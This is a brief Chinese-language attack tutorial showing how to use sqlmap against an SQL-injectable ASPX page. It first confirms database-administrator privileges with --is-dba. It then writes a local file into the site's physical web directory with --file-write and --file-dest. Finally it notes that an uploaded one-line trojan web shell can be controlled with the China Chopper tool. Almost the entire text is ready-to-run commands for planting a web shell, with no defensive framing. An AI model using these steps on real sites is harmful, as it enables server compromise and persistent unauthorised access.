权限：必须为dba权限

file-write  从本地写入


file-dest   写入目标路径


判断是否是dba权限(显示TRUE或者FALSE，TRUE即为dba权限，反之不是)


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba


写入文件至站点目录


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=本地文件路径 --file-dest 网站路径(写入路径)+"/写入的文件名"


sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=F:/a.aspx --file-dest D:/虚拟目录/Front/cx.aspx


D:/虚拟目录/Front   为网站的物理路径


写入成功后，即可通过浏览器访问，若为一句话木马则可使用中国菜刀进行连接。

`注：网站路径必须为网站的真实物理路径(即绝对路径。也就是从盘符开始的路径)，否则无法写入数据。`